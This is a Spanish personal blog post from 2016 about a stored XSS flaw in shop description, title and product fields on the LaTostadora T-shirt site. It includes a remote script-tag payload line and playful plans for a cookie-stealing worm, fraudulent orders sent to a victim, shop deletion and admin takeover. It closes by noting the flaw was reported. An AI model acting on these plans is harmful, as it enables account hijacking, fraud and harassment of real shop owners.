---
title: (ES)Usando la magia del XSS en LaTostadora para ataques imaginativos
date: 2016/11/30 10:03:35
layout: post
path: "/sql-injection-latostadora/"
category: "Imported from my older blog"
---
Hace ya bastantes años que conozco LaTostadora, una web de venta de camisetas y otras prendas que te permite personalizar los productos a tu gusto y montar tu propia tienda para vender por internet con el método de Dropshipping. El caso es que hace unos días me dio la corazonada de que la web no era todo lo segura que debería, y estaba en lo cierto. El servicio te permite cambiar alguna información de tu tienda para darle un toque personal: título, imagen de cabecera, la descripción,... Total, que esto huele a XSS desde lejos, probemos a ver si es verdad: ![screenshot-from-2016-11-30-10-07-17](/wp-content/uploads/2016/11/Screenshot-from-2016-11-30-10-07-17.png)   Luego visitamos la web y... ![screenshot-from-2016-11-30-10-12-44](http://023.es/wp-content/uploads/2016/11/Screenshot-from-2016-11-30-10-12-44.png) It works! :D Como véis no solo se pueden insertar scripts javascript, sino que además se pueden leer las cookies del usuario desde esos mismos scripts (no son cookies HttpOnly). Vale, ahora viene la parte imaginativa del asunto: como aprovechar esto para hacer el máximo ruido. A mi por lo pronto se me ocurren algunas cosillas: 

  1. Fabricar un script que use la cookie capturada para hacer una petición en nombre de ese usuario a la página https://www.latostadora.com/configuracion_basica.php y autoinsertarse en las descripciones de todas sus tiendas. Luego cambio la descripción de mi tienda por: <script src="url.com/js.js" type="text/javascript"></script>. De esta manera, el script se multiplicará por todas las tiendas en pocos dias. Una vez que un gran número de tiendas tiene ese script, cambiarlo (porque recordemos que yo tengo acceso a la url donde se aloja) para que pida 10 camisetas contrarembolso con destino a la casa de alguien que te caiga mal. Resultado? miles de camisetas sin pagar llegando a casa de algún capullo.
  2. También se podría solicitar la eliminación de todas las tiendas junto con todos los diseños que tenga subidos el usuario. Si solo queda en pie mi tienda supongo que los beneficios subirán, no?
  3. Esperar a que alguno de los admin visite mi web y hacerme con el control de su negocio
  4. El único límite es tu imaginación. 
  5. Avisar a los responsables para que lo arrelgen. Admito que es la que menos ilusión me hace, pero puede que me recompensen el hecho de avisarles a ellos antes que a la mafia rusa.
Así que finalmente he optado por esta última, les he escrito un correo para ver a que recompensa podría optar y me han dicho que como mucho aspiro a una camiseta gratis para mi. No es que me parezca poco, pero por si acaso voy a ver si la mafia rusa mejora la oferta antes de aceptar un regalo de 10€ a cambio de una información que te puede ahorrar mas de un quebradero de cabeza. PD: también son vulnerables los campos de título de la tienda, y los titulos de las camisetas.

> Article automatically imported from my old wordpress blog. Here only for reference. Possible format errors and probable missing images. Sorry about that.
